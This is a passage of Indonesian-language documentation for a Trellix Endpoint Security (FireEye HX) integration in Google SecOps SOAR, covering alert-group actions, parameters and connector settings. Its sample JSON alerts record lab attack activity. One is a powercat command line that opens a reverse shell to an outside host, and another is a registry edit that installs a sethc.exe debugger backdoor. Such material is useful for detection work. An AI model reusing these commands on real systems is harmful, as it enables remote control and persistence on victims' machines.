"last_event_at": "2020-12-10T09:26:14.114Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"event_at": "2020-12-10T09:26:14.114+00:00",
"matched_at": "2020-12-10T09:26:56+00:00",
"reported_at": "2020-12-10T09:27:08.735+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 2
},
"url": "/hx/api/v3/alert_groups/e9f4d7baaa362d9d5d0b6e053ba0d44d",
"created_at": "2020-12-10T08:04:54.740Z",
"acknowledgement": {
"acknowledged": true,
"acknowledged_by": "test2",
"acknowledged_time": "2020-12-22T19:00:25.688Z",
"comment": "test comment",
"comment_update_time": "2020-12-22T19:00:25.688Z"
},
"grouped_by": {
"condition_id": "2npvcLf_arxPaH717hQZ9g==",
"detected_by": "ioc_engine",
"host": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"primary_ip_address": "172.30.202.152"
}
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups"
}
Repositori Kasus
| Jenis hasil | Nilai/Deskripsi | Jenis |
|---|---|---|
| Pesan output* | Tindakan tidak boleh gagal atau menghentikan eksekusi playbook: "Successfully updated acknowledgement status for all alert groups" Jika sebagian berhasil dan sebagian tidak: (jumlah ID yang diberikan lebih besar dari total) - "Berhasil mengambil pemberitahuan untuk ID grup pemberitahuan berikut: {succesfull_alert_groups_ids}" Jika tidak ada detail grup pemberitahuan yang diambil: "Tidak dapat mengambil notifikasi untuk ID grup notifikasi yang diberikan. Periksa ID yang diberikan dan coba lagi" Tindakan harus gagal dan menghentikan eksekusi playbook: |
Umum |
Mendapatkan Grup Pemberitahuan Host
Deskripsi
Mencantumkan grup pemberitahuan yang terkait dengan host di Trellix Endpoint Security. Entitas yang didukung: Nama Host, Alamat IP.
Parameter
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib | Deskripsi |
|---|---|---|---|---|
| Filter Konfirmasi | DDL | SEMUA Hanya Dikonfirmasi Hanya Belum Dikonfirmasi |
Tidak | Tentukan apakah Anda ingin menampilkan semua grup pemberitahuan atau hanya yang sudah/belum dikonfirmasi. |
| Jumlah Maksimum Grup Pemberitahuan yang Akan Ditampilkan | Bilangan bulat | 20 | Tidak | Tentukan jumlah Grup Pemberitahuan yang akan ditampilkan per entity. Default: 20. |
Run On
Tindakan ini berjalan di entity berikut:
- Alamat IP
- Hostname
Hasil Tindakan
Hasil Skrip
| Nama Hasil Skrip | Opsi Nilai | Contoh |
|---|---|---|
| is_success | Benar/Salah | is_success:False |
Hasil JSON
{
"_id": "6d9a68f2a78f8d983bd3c0f4556785e6",
"assessment": "[Heur.BZC.ONG.Cheetah.3.1C89233F]",
"file_full_path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"first_event_at": "2021-07-01T09:44:18.809Z",
"last_event_at": "2021-07-01T09:44:18.809Z",
"dispositions": [],
"source": "MAL",
"has_fp_disposition": false,
"last_alert": {
"_id": 812,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"event_at": "2021-07-01T09:44:18.809+00:00",
"matched_at": "2021-07-01T09:44:18.809+00:00",
"reported_at": "2021-07-01T09:44:20.353+00:00",
"source": "MAL",
"resolution": "QUARANTINED",
"decorators": [],
"md5values": [
"36be03ea88f7d1effcafeeb65e0e1e57"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/812",
"condition": null,
"event_id": null,
"event_type": null,
"event_values": {
"system-data": {
"xmlns": "http://www.fireeye.com/antimalware-alert",
"xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
"xsi:schemaLocation": "http://www.fireeye.com/antimalware-alert AM-alert.xsd",
"alert-version": "3",
"correlation-id": "d01e8ea6-4d34-4005-8482-3ccc026e11ea",
"timestamp": "2021-07-01T09:44:18.809Z",
"product-version": "32.36.0",
"engine-version": "11.0.1.19",
"content-version": "7.86346",
"mg-engine-version": "32.30.0.8460",
"mg-content-version": "25",
"whitelist-schema-version": "1.0.0",
"whitelist-content-version": "1.32.1"
},
"os-details": {
"$": {
"name": "windows",
"version": "10.0.14393",
"patch": "0",
"os-arch": "64-bit",
"os-language": "en-US"
}
},
"scan-type": "oas",
"scanned-object": {
"scanned-object-type": "file-event",
"file-event": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"actor-process": {
"pid": "1268",
"path": "C:\\Windows\\System32\\xcopy.exe",
"user": {
"username": "",
"domain": ""
}
},
"sub-type": "FILE_OPERATION_CLOSED"
}
},
"detections": {
"detection": [
{
"engine": {
"engine-type": "av",
"engine-version": "11.0.1.19",
"content-version": "7.86346"
},
"infected-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"infection": {
"confidence-level": "high",
"infection-type": "malware",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F"
},
"action": {
"actioned-object": {
"object-type": "file",
"file-object": {
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"inner-file-path": "",
"original-file-name": "",
"container": "false",
"packed": "false",
"hidden": "false",
"system-file": "false",
"read-only": "false",
"temporary": "false",
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"sha1sum": "ce1cdd84732367cbf2be60df57c52760bf2e8fe9",
"sha256sum": "3862ddf0a77ef8e7e17c641939a6dc349885c1a08cd64748ec50358adafe0631",
"size-in-bytes": "753",
"creation-time": "2021-07-01T09:41:47.610Z",
"modification-time": "2020-05-29T09:34:17.066Z",
"access-time": "2021-07-01T09:41:47.610Z"
}
},
"requested-action": "clean",
"applied-action": "quarantine",
"result": "success",
"error": "0",
"reboot-required": "false"
}
}
]
},
"scan-statistics": {
"total-scan-time-in-ms": "12227"
}
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/6d9a68f2a78f8d983bd3c0f4556785e6",
"created_at": "2021-07-01T09:44:23.726Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"md5sum": "36be03ea88f7d1effcafeeb65e0e1e57",
"file-path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
"infection-name": "Heur.BZC.ONG.Cheetah.3.1C89233F",
"detected_by": "malware_file_access_scan",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
},
{
"_id": "0043aa34dea99c23996c2f16291cdb4e",
"assessment": "[Process powershell.exe started] POWERCAT (UTILITY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2021-07-01T09:41:50.428Z",
"last_event_at": "2021-07-01T09:41:50.428Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 811,
"agent": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"containment_state": "normal"
},
"condition": {
"_id": "KBvTAC_L_GiI9BZbph2GoA==",
"url": "/hx/api/v3/conditions/KBvTAC_L_GiI9BZbph2GoA=="
},
"event_at": "2021-07-01T09:41:50.428+00:00",
"matched_at": "2021-07-01T09:43:29+00:00",
"reported_at": "2021-07-01T09:44:09.339+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"097ce5761c89434367598b34fe32893b"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/811",
"event_id": 11311494,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2021-07-01T09:41:50.428Z",
"processEvent/eventType": "start",
"processEvent/pid": 3676,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 2496,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2021-07-01T09:41:50.428Z",
"processEvent/md5": "097ce5761c89434367598b34fe32893b",
"processEvent/processCmdLine": "powershell -Exec Bypass \". \\\"C:\\TMP\\nc.ps1\\\";powercat -c www.googleaccountsservices.com -p 80 -t 2 -e cmd\""
},
"multiple_match": "Multiple Indicators Matched.",
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/0043aa34dea99c23996c2f16291cdb4e",
"created_at": "2021-07-01T09:44:13.744Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "KBvTAC_L_GiI9BZbph2GoA==",
"detected_by": "ioc_engine",
"host": {
"_id": "JS2asEbMWGgfxT0aHVu034",
"url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
"hostname": "FireEye-Domain",
"primary_ip_address": "172.30.202.71"
}
}
Repositori Kasus
| Jenis hasil | Nilai/Deskripsi | Jenis |
|---|---|---|
| Pesan output\* | Tindakan tidak boleh gagal atau menghentikan eksekusi playbook: if data is not available for one(is_success = true): "Action wasn't able to retrieve alert groups for the following entities in Trellix Endpoint Security: {entity.identifier}". Jika data tidak tersedia untuk semua(is_success=false): "No alert groups were found for the provided entities in Trellix Endpoint Security". Tindakan harus gagal dan menghentikan eksekusi playbook: |
Umum |
| Tabel Repositori Kasus | Kolom:
|
Entity |
Konektor
Konektor Pemberitahuan FireEye HX
Deskripsi
Konektor Pemberitahuan Trellix Endpoint Security Google SecOps SOAR menyerap pemberitahuan yang dihasilkan di server Trellix Endpoint Security.
Konektor secara berkala terhubung ke endpoint server Trellix Endpoint Security API dan menarik daftar pemberitahuan yang dihasilkan untuk jangka waktu tertentu. Jika ada pemberitahuan baru, Konektor akan membuat pemberitahuan Google SecOps SOAR berdasarkan pemberitahuan Trellix Endpoint Security dan menyimpan stempel waktu Konektor sebagai waktu pemberitahuan terakhir yang berhasil di-ingest. Pada eksekusi Konektor berikutnya, Konektor akan mengkueri Trellix Endpoint Security API hanya untuk pemberitahuan, yang dibuat dari stempel waktu (stempel waktu ditambah beberapa offset "teknis" agar konektor tidak "macet"). Jika tidak ada pemberitahuan baru yang ditemukan - selesaikan eksekusi saat ini.
Izin API
Konektor Pemberitahuan Keamanan Endpoint Trellix menggunakan metode dan izin autentikasi API yang sama dengan integrasi FireEye yang ada - untuk bekerja dengan pemberitahuan FireEye, akun yang akan digunakan untuk integrasi harus memiliki peran "API Analyst" atau "API Admin".
Mengonfigurasi Konektor Pemberitahuan FireEye HX di Google SecOps
Untuk mendapatkan petunjuk mendetail tentang cara mengonfigurasi konektor di Google SecOps, lihat Mengonfigurasi konektor.
Parameter konektor
Gunakan parameter berikut untuk mengonfigurasi konektor:
| Nama Tampilan Parameter | Jenis | Nilai Default | Wajib diisi | Deskripsi |
|---|---|---|---|---|
| Nama Kolom Produk | String | ProductName | Ya | Deskripsi yang ditentukan platform, kolom tidak dapat diubah. |
| Nama Kolom Peristiwa | String | AlertName | Ya | Deskripsi yang ditentukan platform, kolom tidak dapat diubah. |
| Nama Kolom Lingkungan | String | "" | Tidak | Mendeskripsikan nama kolom tempat nama lingkungan disimpan. Jika kolom lingkungan tidak ditemukan, lingkungannya adalah "". |
| Pola Regex Lingkungan | String | .* | Tidak | Pola regex untuk dijalankan pada nilai yang ditemukan di kolom "Nama Kolom Lingkungan". Defaultnya adalah .* untuk mencakup semua dan menampilkan nilai tanpa perubahan. Digunakan untuk mengizinkan pengguna memanipulasi kolom lingkungan melalui logika regex Jika pola regex adalah null atau kosong, atau nilai lingkungan adalah null, hasil lingkungan akhir adalah "". |
| Waktu Tunggu Skrip (Detik) | Bilangan bulat | 180 | Ya | Batas waktu untuk proses python yang menjalankan skrip saat ini. |
| Root API | String | https://x.x.x.x:<port> | Ya | URL Root API Server Trellix Endpoint Security |
| Nama pengguna | String | T/A | Ya | Pengguna Trellix Endpoint Security untuk diautentikasi |
| Sandi | Sandi | T/A | Ya | Sandi pengguna Trellix Endpoint Security untuk mengautentikasi |
| Verifikasi SSL | Kotak centang | Dicentang | Ya | Jika ditentukan, konektor akan memeriksa apakah Trellix Endpoint Security dikonfigurasi dengan sertifikat SSL yang valid. Jika sertifikat tidak valid, konektor akan menampilkan error. |
| Selisih waktu dalam jam | Bilangan bulat | 24 | Ya | Mengambil notifikasi dari X jam sebelumnya. |
| Jumlah Maksimum Pemberitahuan Per Siklus | Bilangan bulat | 25 | Ya | Jumlah pemberitahuan yang harus diproses selama satu kali eksekusi konektor. |
| Jenis Pemberitahuan | String | active_threat | Tidak | Tentukan jenis pemberitahuan Trellix Endpoint Security yang akan diproses. Secara default, setelannya adalah active_threat untuk menampilkan notifikasi dalam status ALERT dan QUARANTINED/partial_block. Parameter valid lainnya adalah ALERT, yang hanya akan menampilkan pemberitahuan yang belum ditutup. |
| Menggunakan daftar yang diizinkan sebagai daftar blokir | Kotak centang (checkbox) | Tidak dicentang | Ya | Jika diaktifkan, daftar yang diizinkan akan digunakan sebagai daftar yang diblokir. |
| Alamat Server Proxy | IP_OR_HOST | T/A | Tidak | Server proxy yang akan digunakan untuk koneksi. |
| Nama Pengguna Server Proxy | String | T/A | Tidak | Nama pengguna server proxy. |
| Sandi Server Proxy | Sandi | T/A | Tidak | Sandi server proxy. |
Aturan Konektor
- Aturan daftar yang tidak diizinkan (Blacklist) harus didukung, tetapi konektor menggunakan logika daftar yang diizinkan secara default.
- Aturan daftar yang diizinkan Digunakan secara default.
- Dukungan Proxy Konektor mendukung Proxy.
- Default ConnectorRules
| RuleType(Whitelist \ Blacklist) | RuleName (string) |
|---|---|
| WhiteList | Tentukan dalam bagian ini pemberitahuan mana yang akan diproses berdasarkan atribut sumber dan subjenis pemberitahuan, misalnya: "IOC" untuk pemberitahuan indikator, "MAL AV" untuk memproses hanya pemberitahuan malware dengan subjenis "AV", atau "MAL" untuk memproses semua pemberitahuan malware, terlepas dari subjenisnya. Untuk menyerap semua pemberitahuan, hapus semua yang ada di bagian daftar yang diizinkan. |
Perlu bantuan lain? Dapatkan jawaban dari anggota Komunitas dan profesional Google SecOps.